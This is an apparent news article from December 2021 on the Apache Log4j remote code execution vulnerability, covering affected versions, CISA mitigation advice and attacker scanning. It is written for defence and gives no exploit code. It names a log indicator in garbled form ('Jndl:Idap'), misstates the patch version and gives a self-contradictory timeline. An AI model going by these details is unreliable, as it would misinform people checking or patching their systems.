Log4j: Everything You Need to Know>

Share on facebook
Share on twitter
Share on linkedin
Share on reddit

2 – 4 min read 221 12/16/2021

Security researchers have warned users that attackers are attempting to exploit a critical vulnerability in the Java logging library Apache Log4j. Log4j is a widely used java library that logs error messages in applications used by enterprise software applications as well as custom built applications intended for in-house usage.

The flaw, which was found to allow unauthenticated remote code execution and access to servers, was discovered first in Minecraft on December 9th, but experts are warning cloud users may also be at risk. There is a variety of software that is potentially vulnerable to being exploited since Log4j is a part of so many different forms of enterprise and open-source software, ranging from email services, cloud platforms, and web applications. The severity of this risk has been deemed a 10 out of 10 after exploits began on the 1st of December. Back in 2013, however, the code was first introduced into the codebase that has now been exploited since December 1st, nine days after public disclosure.

CISA’s Advisory And Evaluating Your Risk

The Apache Software Foundation addressed the concern that is affecting versions 2.0beta9 to 2.14.1 with an update, 2.15.o-rc1. CISA has recommended admin and users either upgrade to the latest patch or apply the recommended mitigations to reduce the vulnerability. An organization that has been using the aforementioned versions of Log4j should examine log files that may have been compromised. If you notice user-controlled strings, “Jndl:Idap” could be among those affected. To best mitigate vulnerabilities, it is recommended users change log4j2.formatMsgNoLookups to true by adding:  “‐Dlog4j2.formatMsgNoLookups=True”. As well as the recommended mitigations, the original CVE includes some vendor descriptions and tools that can be used to test your own systems against this vulnerability after patching to make sure you’re protected.

How Far The Exploitation Is Going

Researchers at Check Point have reported attackers making at least 100 attempts every minute of scanning the internet for chances to exploit this vulnerability of Log4j. Bugcrowd founder and CTO Casey Ellis said, “This is a worst-case

Read more